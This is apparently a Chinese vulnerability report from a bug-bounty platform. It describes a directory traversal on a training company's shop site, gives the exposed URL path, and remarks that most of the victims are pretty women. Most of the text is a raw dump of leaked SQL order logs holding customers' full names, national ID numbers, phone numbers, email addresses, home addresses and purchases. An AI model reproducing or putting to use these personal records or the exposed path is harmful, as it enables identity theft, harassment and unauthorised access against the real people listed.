2015-12-21: 细节已通知厂商并且等待厂商处理中 2015-12-22: 厂商已经确认,细节仅向厂商公开 2016-01-01: 细节向核心白帽子及相关领域专家公开 2016-01-11: 细节向普通白帽子公开 2016-01-21: 细节向实习白帽子公开 2016-02-04: 细节向公众公开
包括不限于姓名、电话、邮箱、家庭地址、订单、教育情况等。大多为美女哦~
0x01:目录遍历
http://bm.huatu.com/plus/
bm.huatu.com商城,因此大量用户订单敏感信息泄露,信息量太大,我只贴一小段点到为止:
date:20151220131740INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450587909RN690','2316096','1','258.00','0','202.101.102.194','1450588660','1','2','0','258','bm5.huatu.com','18649850225');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643975','S-P1450587909RN690','2316096','2016年福建省农信社考试笔试辅导课程','258.00','1','GFZNX51608','福州分校','闽侯分部','54','','0','','',0)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('2316096','S-P1450587909RN690','林思敏','350625199304271522','女','18649850225','254482490@qq.com','','应届','','','','');date:20151220132215INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450588789RN154','2285185','1','3280.00','0','61.55.250.123','1450588935','1','2','0','3280','bm5.huatu.com','18232163775');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('637392','S-P1450588789RN154','2285185','2015年河北省邯郸市事业单位考试笔试-提高特训班GHBSY51529','3280.00','1','GHBSY51529','河北分校','邯郸学习中心','99','','0','','',0)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('2285185','S-P1450588789RN154','崔飞飞','130428199311102345','女','18232163775','532764150@qq.com','','在职','','','','');date:20151220132304INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450588885RN149','2312748','1','12.00','0','117.136.66.136','1450588984','1','2','0','12','bm5.huatu.com','18205150176');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('642570','S-P1450588885RN149','2312748','2016年江苏省考笔试辅导课程','12.00','1','GJSSK016201','南京分校','南京分部','24','','0','','',0)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('2312748','S-P1450588885RN149','张思敏','321084199412272146','女','18205150176','326722810@qq.com','','应届','','','','');date:20151220132448INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450588935RN131','2285185','1','3280.00','0','61.55.250.123','1450589088','1','2','0','3280','bm5.huatu.com','13832324363');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('637392','S-P1450588935RN131','2285185','2015年河北省邯郸市事业单位考试笔试-提高特训班GHBSY51529','3280.00','1','GHBSY51529','河北分校','邯郸学习中心','99','','0','','',0)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('2285185','S-P1450588935RN131','张雪彬','130425199101217137','男','13832324363','81486897@qq.com','','在职','','','','');date:20151220132522INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450588428RN891','1024700','1','19800.00','0','175.22.6.42','1450589122','1','2','0','19800','bm5.huatu.com','13567171391');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('622089','S-P1450588428RN891','1024700','2016年浙江省公务员考试笔试辅导课程','19800.00','1','GZJSK016004','浙江分校','杭州总部','472','','9800','','',0)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('1024700','S-P1450588428RN891','张雷','330329199012301174','男','13567171391','571331234@qq.com','','其它','','其它','手机信息','浙江省温州市泰顺县三魁镇下武洋村');date:20151220132718INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450588984RN868','2312748','1','12.00','0','117.136.66.136','1450589238','1','2','0','12','bm5.huatu.com','18205150176');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('642570','S-P1450588984RN868','2312748','2016年江苏省考笔试辅导课程','12.00','1','GJSSK016201','南京分校','南京分部','24','','0','','',0)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('2312748','S-P1450588984RN868','张思敏','321084199412272146','女','18205150176','326722810@qq.com','','应届','','','','');date:20151220133431INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450588053RN228','2316933','1','19.00','0','175.9.198.173','1450589671','1','2','0','19','bm5.huatu.com','18274821784');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('635007','S-P1450588053RN228','2316933','2016年湖南省长沙市河东分校省考笔试视频直播七点半课堂GCSSKD1611A','19.00','1','GCSSKD1611A','长沙分校','长沙总部','90','','0','','',0)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('2316933','S-P1450588053RN228','向群','433101199209102020','女','18274821784','1760640768@qq.com','','在职','','','','');date:20151220133432INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450589345RN611','2316950','1','99.00','0','43.226.121.88','1450589672','1','2','0','99','bm5.huatu.com','15024384917');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('639940','S-P1450589345RN611','2316950','2016年浙江省公务员考试培训辅导课程','99.00','1','GZJSKE16013','浙江分校','金华学习中心','72','','0','','',0)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('2316950','S-P1450589345RN611','黄林美','330722199103196469','女','15024384917','937756126@qq.com','','在职','','','','');date:20151220133631INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450589722RN862','2116687','1','99.00','0','43.226.121.88','1450589791','1','2','0','99','bm5.huatu.com','18267932875');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('639457','S-P1450589722RN862','2116687','2016年浙江省公务员笔试考试辅导课程','99.00','1','GZJSK016888','浙江分校','杭州总部','72','','0','','',0)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('2116687','S-P1450589722RN862','胡冰洁','330621199309227142','女','18267932875','1403141222@qq.com','','在职','','','','磐安县安文镇海螺街1号磐安县文化广电新闻出版局');date:20151220133954INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450589777RN600','2316978','1','880.00','0','60.22.179.48','1450589994','1','2','0','660','bm5.huatu.com','18524279908');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('638193','S-P1450589777RN600','2316978','2016年省考公安基础知识提前学GLNSKSP01601','880.00','1','GLNSKSP01601','沈阳分校','沈阳总部','72','','0','','',0)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('2316978','S-P1450589777RN600','郭美辰','211102199002480024','女','18524279908','352630854@qq.com','','在职','','','','盘锦市兴隆台区双兴宾馆对面华图教育');date:20151220134053INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450589861RN418','1162410','1','99.00','0','112.17.237.23','1450590053','1','2','0','99','bm5.huatu.com','13666895489');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('639457','S-P1450589861RN418','1162410','2016年浙江省公务员笔试考试辅导课程','99.00','1','GZJSK016888','浙江分校','杭州总部','72','','0','','',0)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('1162410','S-P1450589861RN418','王寅','331002199204230010','男','13666895489','469302623@qq.com','','在职','','其它','朋友推荐','');date:20151220135846INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450577158RN883','2316665','1','4980.00','0','14.217.78.22','1450591126','1','2','0','4980','bm5.huatu.com','15625001438');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('641111','S-P1450577158RN883','2316665','2016年东莞市教师招聘面试导师封闭特训班TMSZJS11624','4980.00','1','TMSZJS11624','深圳分校','深圳总部','60','','0','','',2)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('2316665','S-P1450577158RN883','刘淑娴','44190019940523436X','女','15625001438','371333994@qq.com','','应届','','网络','华图网站','');date:20151220140023INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450591132RN182','1506712','1','9.90','0','183.61.37.28','1450591223','1','2','0','9.9','bm5.huatu.com','13158949621');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('641883','S-P1450591132RN182','1506712','2016年海南省公务员考试视频直播课程','9.90','1','GHKSK01646','海南分校','海口总部','38','','0','','',0)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('1506712','S-P1450591132RN182','陈慧慧','46003319881018004X','女','13158949621','316450037@qq.com','','在职','','','','');date:20151220140710INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450591557RN443','573731','1','258.00','0','36.250.94.130','1450591630','1','2','0','258','bm5.huatu.com','15806027313');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643975','S-P1450591557RN443','573731','2016年福建省农信社考试笔试辅导课程','258.00','1','GFZNX51608','福州分校','闽侯分部','54','','0','','',0)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('573731','S-P1450591557RN443','柯江云','350583199007171056','男','15806027313','339685496@qq.com','','在职','','网络','分类信息网站','');date:20151220140904INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450577887RN151','1585096','1','4080.00','0','140.246.12.194','1450591744','1','2','0','4080','bm5.huatu.com','18661825369');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('640483','S-P1450577887RN151','1585096','2016年山东省农信社及青岛农商银行考试笔试辅导课程名师模块班GQDNX01603','4080.00','1','GQDNX01603','青岛分校','青岛总部','108','','1100','','',2)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('1585096','S-P1450577887RN151','赵月','370214199401034548','女','18661825369','1778786639@qq.com','','应届','','网络','华图网站','');date:20151220141106INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450591738RN221','1851629','1','99.00','0','220.191.253.25','1450591866','1','2','0','99','bm5.huatu.com','13857092145');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('639457','S-P1450591738RN221','1851629','2016年浙江省公务员笔试考试辅导课程','99.00','1','GZJSK016888','浙江分校','杭州总部','72','','0','','',0)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('1851629','S-P1450591738RN221','范佳华','332526198706253516','男','13857092145','fanjiahuakxkl@qq.com','','在职','','','','丽水市继光街27号310室');date:20151220141622INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450591873RN936','2317046','1','258.00','0','218.106.150.254','1450592182','1','2','0','258','bm5.huatu.com','15980566164');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643976','S-P1450591873RN936','2317046','2016年福建省农信社考试笔试辅导课程','258.00','1','GFZNX51607','福州分校','闽侯分部','54','','0','','',0)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('2317046','S-P1450591873RN936','游厦莲','350128199306050928','女','15980566164','891740481@qq.com','','应届','','其它','朋友推荐','福建省福州市闽侯县上街镇福建江夏学院生活区');date:20151220141724INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450592126RN688','1587197','1','49.00','0','182.105.8.204','1450592244','1','2','0','49','bm5.huatu.com','13767895570');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643328','S-P1450592126RN688','1587197','2016年江西省教师招聘笔试','49.00','1','TBJXJS01600','南昌分校','南昌分部','21','','0','','',0)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('1587197','S-P1450592126RN688','叶谢丽莎','360302199301064529','女','13767895570','512949758@qq.com','','其它','','网络','华图网站','江西省萍乡市安源区滨河东路同聚大酒店往北桥方向100米(可叫中碗菜代收)');date:20151220142409INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450592244RN207','1587197','1','49.00','0','182.105.8.204','1450592649','1','2','0','49','bm5.huatu.com','13767895570');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643328','S-P1450592244RN207','1587197','2016年江西省教师招聘笔试','49.00','1','TBJXJS01600','南昌分校','南昌分部','21','','0','','',0)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('1587197','S-P1450592244RN207','叶谢丽莎','360302199301064529','女','13767895570','512949758@qq.com','','其它','','网络','华图网站','江西省萍乡市安源区滨河东路同聚大酒店往北桥方向100米(可叫中碗菜柜台代收)');date:20151220143752INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450593299RN434','2310524','1','11000.00','0','113.84.223.183','1450593472','1','2','0','11000','bm5.huatu.com','15915814149');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('644222','S-P1450593299RN434','2310524','圣诞活动班号GSZPRZ01608Y','11000.00','1','GSZPRZ01608Y','深圳分校','深圳总部','273','','3000','','',2)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('2310524','S-P1450593299RN434','郑则坤','440582199012010914','男','15915814149','189692442@qq.com','','在职','','','','');date:20151220144105INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450593587RN850','2187376','1','49.00','0','14.17.37.43','1450593665','1','2','0','49','bm5.huatu.com','18370881269');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643328','S-P1450593587RN850','2187376','2016年江西省教师招聘笔试','49.00','1','TBJXJS01600','南昌分校','南昌分部','21','','0','','',0)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('2187376','S-P1450593587RN850','李晓海','360722199010103660','女','18370881269','532612807@qq.com','','在职','','网络','华图网站','江西省赣州市上犹县梅水乡洋田村');date:20151220144231INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450593472RN886','2310524','1','11000.00','0','113.84.223.183','1450593751','1','2','0','11000','bm5.huatu.com','15915814149');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('644222','S-P1450593472RN886','2310524','圣诞活动班号GSZPRZ01608Y','11000.00','1','GSZPRZ01608Y','深圳分校','深圳总部','273','','3000','','',2)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('2310524','S-P1450593472RN886','郑则坤','440582199012010914','男','15915814149','189692442@qq.com','','在职','','','','');date:20151220144601INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450593602RN745','1609559','1','5320.00','0','61.191.254.226','1450593961','1','2','0','5320','bm5.huatu.com','15055136368');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643169','S-P1450593602RN745','1609559','2015年下半年合肥市直事业单位面试全封闭密训营','5320.00','1','MAHSY01588C','安徽分校','合肥总部','72','5320','420','AHSY201511280018','',2)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('1609559','S-P1450593602RN745','李样','340822199305036284','女','15055136368','1183952149@qq.com','','其它','','','','');date:20151220145548INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450594479RN753','2315671','1','258.00','0','27.151.185.190','1450594548','1','2','0','258','bm5.huatu.com','15205913632');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643976','S-P1450594479RN753','2315671','2016年福建省农信社考试笔试辅导课程','258.00','1','GFZNX51607','福州分校','闽侯分部','54','','0','','',0)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('2315671','S-P1450594479RN753','许灿荣','350521199112165011','男','15205913632','351535610@qq.com','','在职','','','','');date:20151220145807INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450594603RN130','867256','1','258.00','0','58.23.79.20','1450594687','1','2','0','258','bm5.huatu.com','15906063627');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643976','S-P1450594603RN130','867256','2016年福建省农信社考试笔试辅导课程','258.00','1','GFZNX51607','福州分校','闽侯分部','54','','0','','',0)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('867256','S-P1450594603RN130','林丽芳','350583199112018088','女','15906063627','632820410@qq.com','','在职','','网络','华图网站','');date:20151220151337INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450594856RN317','2317122','1','258.00','0','175.43.82.103','1450595617','1','2','0','258','bm5.huatu.com','15880806389');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('643976','S-P1450594856RN317','2317122','2016年福建省农信社考试笔试辅导课程','258.00','1','GFZNX51607','福州分校','闽侯分部','54','','0','','',0)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('2317122','S-P1450594856RN317','柯燕芳','350583199205101040','女','15880806389','4031333815@qq.com','','在职','','网络','QQ','');date:20151220152141INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450595984RN225','2317147','1','4780.00','0','120.43.85.32','1450596101','1','2','0','4780','bm5.huatu.com','13605929082');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('630018','S-P1450595984RN225','2317147','2015年事业单位面试辅导课程 实战突破班 MXMSY01538','4780.00','1','MXMSY01538','厦门分校','厦门总部','48','','500','','',2)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('2317147','S-P1450595984RN225','刘子瑞','350821198611040418','男','13605929082','1316812703@qq.com','','其它','','网络','华图网站','');date:20151220152726INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450596084RN551','2052263','1','1680.00','0','183.62.131.1','1450596446','1','2','0','1680','bm5.huatu.com','15918638599');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('642456','S-P1450596084RN551','2052263','2015年深圳市考在职特训班GSZPRZ01609D','1680.00','1','GSZPRZ01609D','深圳分校','深圳总部','120','','0','','',0)INSERT INTO `#@__shops_userinfo` (`userid`,`oid`,`consignee`,`address`,`zip`,`tel`,`email`,`des`,`zaizhi`,`nianxian`,`tujinfl`,`tujin`,`yj_dizhi`) VALUES ('2052263','S-P1450596084RN551','郑楚玲','440183198212225821','女','15918638599','1030449557@qq.com','','在职','','','','');date:20151220153221INSERT INTO `#@__shops_orders` (`oid`,`userid`,`cartcount`,`price`,`state`,`ip`,`stime`,`pid`,`paytype`,`dprice`,`priceCount`,`domain`,`fukuanfs`) VALUES ('S-P1450596642RN548','399047','1','99.00','0','60.191.246.38','1450596741','1','2','0','99','bm5.huatu.com','18705899883');INSERT INTO `#@__shops_products` (`aid`,`oid`,`userid`,`title`,`price`,`buynum`,`bc`,`sqfx`,`fb`,`xs`,`xf`,`zs`,`htwyid`,`htzwpm`,`sfzs`) VALUES ('639457','S-P1450596642RN548','399047','2016年浙江省公务员笔试考试辅导课程','99.00','1','GZJSK016888','浙江分校','杭州总部','72','','0','','',0)INSERT INTO `#@__shops_userinfo` 